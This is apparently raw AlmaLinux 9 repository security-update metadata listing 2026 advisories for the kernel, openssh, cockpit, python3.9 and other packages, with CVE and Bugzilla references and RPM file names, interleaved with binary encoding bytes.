glibc-langpack-gd-2.34-231.el9_7.10.x86_64.rpm�,
glibc-langpack-ckb-2.34-231.el9_7.10.x86_64.rpm��ׄD�{
�6��BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ��#�whttps://access.redhat.com/errata/RHSA-2026:3066RHSA-2026:3066RHSA-2026:3066https://access.redhat.com/security/cve/CVE-2025-38129CVE-2025-38129CVE-2025-38129https://access.redhat.com/security/cve/CVE-2025-38206CVE-2025-38206CVE-2025-38206https://bugzilla.redhat.com/23760342376034https://bugzilla.redhat.com/23763772376377https://errata.almalinux.org/9/ALSA-2026-3066.htmlALSA-2026:3066ALSA-2026:3066tkernel-modules-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-modules-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-5.14.0-611.35.1.el9_7.x86_64.rpm"tkernel-uki-virt-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-modules-core-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-core-5.14.0-611.35.1.el9_7.x86_64.rpm!tkernel-modules-core-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-tools-5.14.0-611.35.1.el9_7.x86_64.rpm%tkernel-uki-virt-addons-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-tools-libs-5.14.0-611.35.1.el9_7.x86_64.rpm tkernel-debug-uki-virt-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-core-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-abi-stablelists-5.14.0-611.35.1.el9_7.noarch.rpmtkernel-debug-modules-extra-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-modules-extra-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-modules-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-modules-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-5.14.0-611.35.1.el9_7.x86_64.rpm"tkernel-uki-virt-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-modules-core-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-core-5.14.0-611.35.1.el9_7.x86_64.rpm!tkernel-modules-core-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-tools-5.14.0-611.35.1.el9_7.x86_64.rpm%tkernel-uki-virt-addons-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-tools-libs-5.14.0-611.35.1.el9_7.x86_64.rpm tkernel-debug-uki-virt-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-debug-core-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-abi-stablelists-5.14.0-611.35.1.el9_7.noarch.rpmtkernel-debug-modules-extra-5.14.0-611.35.1.el9_7.x86_64.rpmtkernel-modules-extra-5.14.0-611.35.1.el9_7.x86_64.rpm�̀�-�|
�7��^BsecurityImportant: libpng security update� '���6https://access.redhat.com/errata/RHSA-2026:3405RHSA-2026:3405RHSA-2026:3405https://access.redhat.com/security/cve/CVE-2026-22695CVE-2026-22695CVE-2026-22695https://access.redhat.com/security/cve/CVE-2026-22801CVE-2026-22801CVE-2026-22801https://access.redhat.com/security/cve/CVE-2026-25646CVE-2026-25646CVE-2026-25646https://bugzilla.redhat.com/24288242428824https://bugzilla.redhat.com/24288252428825https://bugzilla.redhat.com/24385422438542https://errata.almalinux.org/9/ALSA-2026-3405.htmlALSA-2026:3405ALSA-2026:3405�,�libpng-1.6.37-12.el9_7.2.x86_64.rpm�,�libpng-1.6.37-12.el9_7.2.i686.rpm�,�libpng-1.6.37-12.el9_7.2.x86_64.rpm�,�libpng-1.6.37-12.el9_7.2.i686.rpm�͖��}
�8��aBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ��P�Zhttps://access.redhat.com/errata/RHSA-2026:3488RHSA-2026:3488RHSA-2026:3488https://access.redhat.com/security/cve/CVE-2025-40168CVE-2025-40168CVE-2025-40168https://access.redhat.com/security/cve/CVE-2025-71085CVE-2025-71085CVE-2025-71085https://access.redhat.com/security/cve/CVE-2026-23097CVE-2026-23097CVE-2026-23097https://bugzilla.redhat.com/24144822414482https://bugzilla.redhat.com/24290262429026https://bugzilla.redhat.com/24368022436802https://errata.almalinux.org/9/ALSA-2026-3488.htmlALSA-2026:3488ALSA-2026:3488ukernel-debug-modules-extra-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-modules-core-5.14.0-611.36.1.el9_7.x86_64.rpm ukernel-debug-uki-virt-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-tools-5.14.0-611.36.1.el9_7.x86_64.rpm!ukernel-modules-core-5.14.0-611.36.1.el9_7.x86_64.rpm%ukernel-uki-virt-addons-5.14.0-611.36.1.el9_7.x86_64.rpm"ukernel-uki-virt-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-modules-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-modules-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-core-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-modules-extra-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-tools-libs-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-core-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-abi-stablelists-5.14.0-611.36.1.el9_7.noarch.rpmukernel-debug-modules-extra-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-modules-core-5.14.0-611.36.1.el9_7.x86_64.rpm ukernel-debug-uki-virt-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-tools-5.14.0-611.36.1.el9_7.x86_64.rpm!ukernel-modules-core-5.14.0-611.36.1.el9_7.x86_64.rpm%ukernel-uki-virt-addons-5.14.0-611.36.1.el9_7.x86_64.rpm"ukernel-uki-virt-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-modules-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-modules-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-core-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-modules-extra-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-tools-libs-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-debug-core-5.14.0-611.36.1.el9_7.x86_64.rpmukernel-abi-stablelists-5.14.0-611.36.1.el9_7.noarch.rpm�͠�[�~
�9��@BBBsecurityModerate: nfs-utils security update� ��*�@https://access.redhat.com/errata/RHSA-2026:3940RHSA-2026:3940RHSA-2026:3940https://access.redhat.com/security/cve/CVE-2025-12801CVE-2025-12801CVE-2025-12801https://bugzilla.redhat.com/24130812413081https://errata.almalinux.org/9/ALSA-2026-3940.htmlALSA-2026:3940ALSA-2026:3940�:�rlibnfsidmap-2.5.4-38.el9_7.3.i686.rpm�:�rlibnfsidmap-2.5.4-38.el9_7.3.x86_64.rpm�h�rnfs-utils-2.5.4-38.el9_7.3.x86_64.rpm�:�rlibnfsidmap-2.5.4-38.el9_7.3.i686.rpm�:�rlibnfsidmap-2.5.4-38.el9_7.3.x86_64.rpm�h�rnfs-utils-2.5.4-38.el9_7.3.x86_64.rpm��ϲ!�
�:��EBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ��j�https://access.redhat.com/errata/RHSA-2026:3966RHSA-2026:3966RHSA-2026:3966https://access.redhat.com/security/cve/CVE-2025-38106CVE-2025-38106CVE-2025-38106https://access.redhat.com/security/cve/CVE-2026-23001CVE-2026-23001CVE-2026-23001https://bugzilla.redhat.com/23760772376077https://bugzilla.redhat.com/24326642432664https://errata.almalinux.org/9/ALSA-2026-3966.htmlALSA-2026:3966ALSA-2026:3966vkernel-abi-stablelists-5.14.0-611.38.1.el9_7.noarch.rpmvkernel-debug-modules-extra-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-modules-5.14.0-611.38.1.el9_7.x86_64.rpm"vkernel-uki-virt-5.14.0-611.38.1.el9_7.x86_64.rpm!vkernel-modules-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-tools-libs-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-modules-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-tools-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-modules-5.14.0-611.38.1.el9_7.x86_64.rpm vkernel-debug-uki-virt-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-modules-extra-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-5.14.0-611.38.1.el9_7.x86_64.rpm%vkernel-uki-virt-addons-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-abi-stablelists-5.14.0-611.38.1.el9_7.noarch.rpmvkernel-debug-modules-extra-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-modules-5.14.0-611.38.1.el9_7.x86_64.rpm"vkernel-uki-virt-5.14.0-611.38.1.el9_7.x86_64.rpm!vkernel-modules-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-tools-libs-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-modules-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-tools-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-modules-5.14.0-611.38.1.el9_7.x86_64.rpm vkernel-debug-uki-virt-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-modules-extra-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-5.14.0-611.38.1.el9_7.x86_64.rpm%vkernel-uki-virt-addons-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-core-5.14.0-611.38.1.el9_7.x86_64.rpmvkernel-debug-5.14.0-611.38.1.el9_7.x86_64.rpm����
�;��dBBBsecurityModerate: python3.9 security update� ��{�`	https://access.redhat.com/errata/RHSA-2026:4168RHSA-2026:4168RHSA-2026:4168https://bugzilla.redhat.com/24313682431368https://bugzilla.redhat.com/24313732431373https://bugzilla.redhat.com/24324372432437https://errata.almalinux.org/9/ALSA-2026-4168.htmlALSA-2026:4168ALSA-2026:4168https://www.redhat.com/security/data/cve/CVE-2025-15366.htmlCVE-2025-15366CVE-2025-15366https://www.redhat.com/security/data/cve/CVE-2025-15367.htmlCVE-2025-15367CVE-2025-15367https://www.redhat.com/security/data/cve/CVE-2026-0865.htmlCVE-2026-0865CVE-2026-0865https://www.redhat.com/security/data/cve/CVE-2026-1299.htmlCVE-2026-1299CVE-2026-1299�� python3-3.9.25-3.el9_7.1.x86_64.rpm-� python3-libs-3.9.25-3.el9_7.1.x86_64.rpm-� python3-libs-3.9.25-3.el9_7.1.i686.rpm�� python3-3.9.25-3.el9_7.1.x86_64.rpm-� python3-libs-3.9.25-3.el9_7.1.x86_64.rpm-� python3-libs-3.9.25-3.el9_7.1.i686.rpm��ϰ$�
�<��iBsecurityModerate: gnutls security update� ��[�Thttps://access.redhat.com/errata/RHSA-2026:4188RHSA-2026:4188RHSA-2026:4188https://access.redhat.com/security/cve/CVE-2025-14831CVE-2025-14831CVE-2025-14831https://access.redhat.com/security/cve/CVE-2025-9820CVE-2025-9820CVE-2025-9820https://bugzilla.redhat.com/23925282392528https://bugzilla.redhat.com/24231772423177https://errata.almalinux.org/9/ALSA-2026-4188.htmlALSA-2026:4188ALSA-2026:4188�#�gnutls-3.8.3-10.el9_7.i686.rpm�#�gnutls-3.8.3-10.el9_7.x86_64.rpm�#�gnutls-3.8.3-10.el9_7.i686.rpm�#�gnutls-3.8.3-10.el9_7.x86_64.rpm��Ϯ5�
�=��lBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ��/�https://access.redhat.com/errata/RHSA-2026:4759RHSA-2026:4759RHSA-2026:4759https://access.redhat.com/security/cve/CVE-2025-39818CVE-2025-39818CVE-2025-39818https://access.redhat.com/security/cve/CVE-2025-68800CVE-2025-68800CVE-2025-68800https://bugzilla.redhat.com/23957972395797https://bugzilla.redhat.com/24290652429065https://errata.almalinux.org/9/ALSA-2026-4759.htmlALSA-2026:4759ALSA-2026:4759wkernel-modules-extra-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-modules-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-tools-libs-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-abi-stablelists-5.14.0-611.41.1.el9_7.noarch.rpmwkernel-debug-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-modules-extra-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-5.14.0-611.41.1.el9_7.x86_64.rpm"wkernel-uki-virt-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-5.14.0-611.41.1.el9_7.x86_64.rpm%wkernel-uki-virt-addons-5.14.0-611.41.1.el9_7.x86_64.rpm!wkernel-modules-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-modules-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-tools-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-modules-5.14.0-611.41.1.el9_7.x86_64.rpm wkernel-debug-uki-virt-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-modules-extra-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-modules-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-tools-libs-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-abi-stablelists-5.14.0-611.41.1.el9_7.noarch.rpmwkernel-debug-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-modules-extra-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-5.14.0-611.41.1.el9_7.x86_64.rpm"wkernel-uki-virt-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-5.14.0-611.41.1.el9_7.x86_64.rpm%wkernel-uki-virt-addons-5.14.0-611.41.1.el9_7.x86_64.rpm!wkernel-modules-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-modules-core-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-tools-5.14.0-611.41.1.el9_7.x86_64.rpmwkernel-debug-modules-5.14.0-611.41.1.el9_7.x86_64.rpm wkernel-debug-uki-virt-5.14.0-611.41.1.el9_7.x86_64.rpm����t�
����KBBBBBBBBBBBBBBBBBsecurityModerate: grub2 security update� ��3�Ehttps://access.redhat.com/errata/RHSA-2026:4760RHSA-2026:4760RHSA-2026:4760https://access.redhat.com/security/cve/CVE-2025-61662CVE-2025-61662CVE-2025-61662https://bugzilla.redhat.com/24146832414683https://errata.almalinux.org/9/ALSA-2026-4760.htmlALSA-2026:4760ALSA-2026:4760�n�grub2-tools-extra-2.06-114.el9_7.1.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�>�grub2-efi-x64-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�o�grub2-tools-minimal-2.06-114.el9_7.1.alma.1.x86_64.rpm�j�grub2-efi-x64-cdboot-2.06-114.el9_7.1.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-114.el9_7.1.alma.1.x86_64.rpm�k�grub2-pc-2.06-114.el9_7.1.alma.1.x86_64.rpm�<�grub2-common-2.06-114.el9_7.1.alma.1.noarch.rpm�=�grub2-efi-aa64-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�i�grub2-efi-x64-2.06-114.el9_7.1.alma.1.x86_64.rpm�l�grub2-tools-2.06-114.el9_7.1.alma.1.x86_64.rpm��grub2-ppc64le-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�n�grub2-tools-extra-2.06-114.el9_7.1.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�>�grub2-efi-x64-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�o�grub2-tools-minimal-2.06-114.el9_7.1.alma.1.x86_64.rpm�j�grub2-efi-x64-cdboot-2.06-114.el9_7.1.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-114.el9_7.1.alma.1.x86_64.rpm�k�grub2-pc-2.06-114.el9_7.1.alma.1.x86_64.rpm�<�grub2-common-2.06-114.el9_7.1.alma.1.noarch.rpm�=�grub2-efi-aa64-modules-2.06-114.el9_7.1.alma.1.noarch.rpm�i�grub2-efi-x64-2.06-114.el9_7.1.alma.1.x86_64.rpm�l�grub2-tools-2.06-114.el9_7.1.alma.1.x86_64.rpm��grub2-ppc64le-modules-2.06-114.el9_7.1.alma.1.noarch.rpm���{�
�>��_BsecurityImportant: libarchive security update� '��x�https://access.redhat.com/errata/RHSA-2026:5080RHSA-2026:5080RHSA-2026:5080https://access.redhat.com/security/cve/CVE-2026-4111CVE-2026-4111CVE-2026-4111https://bugzilla.redhat.com/24464532446453https://errata.almalinux.org/9/ALSA-2026-5080.htmlALSA-2026:5080ALSA-2026:5080�.�libarchive-3.5.3-7.el9_7.x86_64.rpm�.�libarchive-3.5.3-7.el9_7.i686.rpm�.�libarchive-3.5.3-7.el9_7.x86_64.rpm�.�libarchive-3.5.3-7.el9_7.i686.rpm�����
�?��bBsecurityModerate: vim security update� ��y�xhttps://access.redhat.com/errata/RHSA-2026:5602RHSA-2026:5602RHSA-2026:5602https://access.redhat.com/security/cve/CVE-2026-25749CVE-2026-25749CVE-2026-25749https://bugzilla.redhat.com/24378432437843https://errata.almalinux.org/9/ALSA-2026-5602.htmlALSA-2026:5602ALSA-2026:5602�S�	vim-minimal-8.2.2637-23.el9_7.1.x86_64.rpm�7�	vim-filesystem-8.2.2637-23.el9_7.1.noarch.rpm�S�	vim-minimal-8.2.2637-23.el9_7.1.x86_64.rpm�7�	vim-filesystem-8.2.2637-23.el9_7.1.noarch.rpm���
��0��eBBBBBBBBBsecurityModerate: opencryptoki security update� ��q�[https://access.redhat.com/errata/RHSA-2026:5603RHSA-2026:5603RHSA-2026:5603https://access.redhat.com/security/cve/CVE-2026-23893CVE-2026-23893CVE-2026-23893https://bugzilla.redhat.com/24319092431909https://errata.almalinux.org/9/ALSA-2026-5603.htmlALSA-2026:5603ALSA-2026:5603�2�@opencryptoki-libs-3.25.0-4.el9_7.2.i686.rpm�t�@opencryptoki-icsftok-3.25.0-4.el9_7.2.x86_64.rpm�u�@opencryptoki-swtok-3.25.0-4.el9_7.2.x86_64.rpm�2�@opencryptoki-libs-3.25.0-4.el9_7.2.x86_64.rpm�o�@opencryptoki-ccatok-3.25.0-4.el9_7.2.x86_64.rpm�s�@opencryptoki-3.25.0-4.el9_7.2.x86_64.rpm�2�@opencryptoki-libs-3.25.0-4.el9_7.2.i686.rpm�t�@opencryptoki-icsftok-3.25.0-4.el9_7.2.x86_64.rpm�u�@opencryptoki-swtok-3.25.0-4.el9_7.2.x86_64.rpm�2�@opencryptoki-libs-3.25.0-4.el9_7.2.x86_64.rpm�o�@opencryptoki-ccatok-3.25.0-4.el9_7.2.x86_64.rpm�s�@opencryptoki-3.25.0-4.el9_7.2.x86_64.rpm��K�
���qBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ��L�<https://access.redhat.com/errata/RHSA-2026:6153RHSA-2026:6153RHSA-2026:6153https://access.redhat.com/security/cve/CVE-2025-38180CVE-2025-38180CVE-2025-38180https://access.redhat.com/security/cve/CVE-2025-40096CVE-2025-40096CVE-2025-40096https://access.redhat.com/security/cve/CVE-2026-23144CVE-2026-23144CVE-2026-23144https://access.redhat.com/security/cve/CVE-2026-23171CVE-2026-23171CVE-2026-23171https://access.redhat.com/security/cve/CVE-2026-23191CVE-2026-23191CVE-2026-23191https://access.redhat.com/security/cve/CVE-2026-23193CVE-2026-23193CVE-2026-23193https://access.redhat.com/security/cve/CVE-2026-23204CVE-2026-23204CVE-2026-23204https://access.redhat.com/security/cve/CVE-2026-23209CVE-2026-23209CVE-2026-23209https://bugzilla.redhat.com/23763762376376https://bugzilla.redhat.com/24073332407333https://bugzilla.redhat.com/24398722439872https://bugzilla.redhat.com/24398862439886https://bugzilla.redhat.com/24398872439887https://bugzilla.redhat.com/24399002439900https://bugzilla.redhat.com/24399312439931https://bugzilla.redhat.com/24399472439947https://errata.almalinux.org/9/ALSA-2026-6153.htmlALSA-2026:6153ALSA-2026:6153!xkernel-modules-core-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-modules-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-abi-stablelists-5.14.0-611.45.1.el9_7.noarch.rpmxkernel-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-modules-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-tools-libs-5.14.0-611.45.1.el9_7.x86_64.rpm xkernel-debug-uki-virt-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-core-5.14.0-611.45.1.el9_7.x86_64.rpm"xkernel-uki-virt-5.14.0-611.45.1.el9_7.x86_64.rpm%xkernel-uki-virt-addons-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-modules-extra-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-core-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-modules-extra-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-modules-core-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-tools-5.14.0-611.45.1.el9_7.x86_64.rpm!xkernel-modules-core-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-modules-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-abi-stablelists-5.14.0-611.45.1.el9_7.noarch.rpmxkernel-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-modules-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-tools-libs-5.14.0-611.45.1.el9_7.x86_64.rpm xkernel-debug-uki-virt-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-core-5.14.0-611.45.1.el9_7.x86_64.rpm"xkernel-uki-virt-5.14.0-611.45.1.el9_7.x86_64.rpm%xkernel-uki-virt-addons-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-modules-extra-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-core-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-modules-extra-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-modules-core-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-debug-5.14.0-611.45.1.el9_7.x86_64.rpmxkernel-tools-5.14.0-611.45.1.el9_7.x86_64.rpm�θ�M�
���PsecurityModerate: rsync security update� ���Bhttps://access.redhat.com/errata/RHSA-2026:6390RHSA-2026:6390RHSA-2026:6390https://access.redhat.com/security/cve/CVE-2025-10158CVE-2025-10158CVE-2025-10158https://bugzilla.redhat.com/24156372415637https://errata.almalinux.org/9/ALSA-2026-6390.htmlALSA-2026:6390ALSA-2026:6390�=�-rsync-3.2.5-3.el9_7.2.x86_64.rpm�=�-rsync-3.2.5-3.el9_7.2.x86_64.rpm�θ�>�	
���RBBBBBBsecurityImportant: openssh security update� '��J�https://access.redhat.com/errata/RHSA-2026:6462RHSA-2026:6462RHSA-2026:6462https://access.redhat.com/security/cve/CVE-2026-3497CVE-2026-3497CVE-2026-3497https://bugzilla.redhat.com/24470852447085https://errata.almalinux.org/9/ALSA-2026-6462.htmlALSA-2026:6462ALSA-2026:6462�s�}openssh-keycat-8.7p1-48.el9_7.alma.1.x86_64.rpm�r�}openssh-clients-8.7p1-48.el9_7.alma.1.x86_64.rpm�t�}openssh-server-8.7p1-48.el9_7.alma.1.x86_64.rpm�q�}openssh-8.7p1-48.el9_7.alma.1.x86_64.rpm�s�}openssh-keycat-8.7p1-48.el9_7.alma.1.x86_64.rpm�r�}openssh-clients-8.7p1-48.el9_7.alma.1.x86_64.rpm�t�}openssh-server-8.7p1-48.el9_7.alma.1.x86_64.rpm�q�}openssh-8.7p1-48.el9_7.alma.1.x86_64.rpm����5�

���ZBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update� ��V�
https://access.redhat.com/errata/RHSA-2026:6570RHSA-2026:6570RHSA-2026:6570https://access.redhat.com/security/cve/CVE-2025-38109CVE-2025-38109CVE-2025-38109https://access.redhat.com/security/cve/CVE-2026-23111CVE-2026-23111CVE-2026-23111https://access.redhat.com/security/cve/CVE-2026-23210CVE-2026-23210CVE-2026-23210https://access.redhat.com/security/cve/CVE-2026-23231CVE-2026-23231CVE-2026-23231https://bugzilla.redhat.com/23761012376101https://bugzilla.redhat.com/24396872439687https://bugzilla.redhat.com/24398952439895https://bugzilla.redhat.com/24443762444376https://errata.almalinux.org/9/ALSA-2026-6570.htmlALSA-2026:6570ALSA-2026:6570ykernel-tools-5.14.0-611.47.1.el9_7.x86_64.rpm ykernel-debug-uki-virt-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-abi-stablelists-5.14.0-611.47.1.el9_7.noarch.rpm%ykernel-uki-virt-addons-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-tools-libs-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-modules-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-modules-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-modules-5.14.0-611.47.1.el9_7.x86_64.rpm!ykernel-modules-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-modules-extra-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-5.14.0-611.47.1.el9_7.x86_64.rpm"ykernel-uki-virt-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-modules-extra-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-tools-5.14.0-611.47.1.el9_7.x86_64.rpm ykernel-debug-uki-virt-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-abi-stablelists-5.14.0-611.47.1.el9_7.noarch.rpm%ykernel-uki-virt-addons-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-tools-libs-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-modules-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-modules-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-modules-5.14.0-611.47.1.el9_7.x86_64.rpm!ykernel-modules-core-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-modules-extra-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-debug-5.14.0-611.47.1.el9_7.x86_64.rpm"ykernel-uki-virt-5.14.0-611.47.1.el9_7.x86_64.rpmykernel-modules-extra-5.14.0-611.47.1.el9_7.x86_64.rpm����
���yBBBsecurityImportant: python3.9 security update� '��h�Yhttps://access.redhat.com/errata/RHSA-2026:6766RHSA-2026:6766RHSA-2026:6766https://access.redhat.com/security/cve/CVE-2026-4519CVE-2026-4519CVE-2026-4519https://bugzilla.redhat.com/24496492449649https://errata.almalinux.org/9/ALSA-2026-6766.htmlALSA-2026:6766ALSA-2026:6766-�!python3-libs-3.9.25-3.el9_7.2.i686.rpm-�!python3-libs-3.9.25-3.el9_7.2.x86_64.rpm��!python3-3.9.25-3.el9_7.2.x86_64.rpm-�!python3-libs-3.9.25-3.el9_7.2.i686.rpm-�!python3-libs-3.9.25-3.el9_7.2.x86_64.rpm��!python3-3.9.25-3.el9_7.2.x86_64.rpm����
���~BBBBBBBsecurityCritical: cockpit: Unauthenticated remote code execution due to SSH command-line argument injection� ���A�https://access.redhat.com/errata/RHSA-2026:7384RHSA-2026:7384RHSA-2026:7384https://access.redhat.com/security/cve/CVE-2026-4631CVE-2026-4631CVE-2026-4631https://errata.almalinux.org/9/ALSA-2026-7384.htmlALSA-2026:7384ALSA-2026:7384�F�Pcockpit-bridge-344-2.el9_7.noarch.rpm�H�Pcockpit-system-344-2.el9_7.noarch.rpm�P�Pcockpit-ws-344-2.el9_7.x86_64.rpm�O�Pcockpit-344-2.el9_7.x86_64.rpm�X�Pcockpit-ws-selinux-344-2.el9_7.x86_64.rpm�G�Pcockpit-doc-344-2.el9_7.noarch.rpm�F�Pcockpit-bridge-344-2.el9_7.noarch.rpm�H�Pcockpit-system-344-2.el9_7.noarch.rpm�P�Pcockpit-ws-344-2.el9_7.x86_64.rpm�O�Pcockpit-344-2.el9_7.x86_64.rpm�X�Pcockpit-ws-selinux-344-2.el9_7.x86_64.rpm�G�Pcockpit-doc-344-2.el9_7.noarch.rpm���z�

��
